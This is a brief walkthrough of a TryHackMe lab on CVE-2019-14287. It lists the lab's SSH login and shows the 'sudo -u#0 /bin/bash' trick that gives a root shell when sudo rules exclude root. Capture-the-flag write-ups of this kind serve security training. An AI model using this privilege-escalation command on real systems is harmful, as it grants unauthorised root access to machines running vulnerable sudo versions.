TryHackMe - Sudo Security Bypass

• Let's ssh to the machine ssh -p 2222 tryhackme@10.10.114.224 password is tryhackme

• sudo -l sends back to us the requirement to exploit CVE-2019-14287
• Following the example shown we could try to use this trick sudo -u#0 <command> and put /bin/bash as the command and it works!

Questions

• What command are you allowed to run with sudo? Answer /bin/bash

• What is the flag in /root/root.txt? I will let you answer this on your own you will need to cat /root/root.txt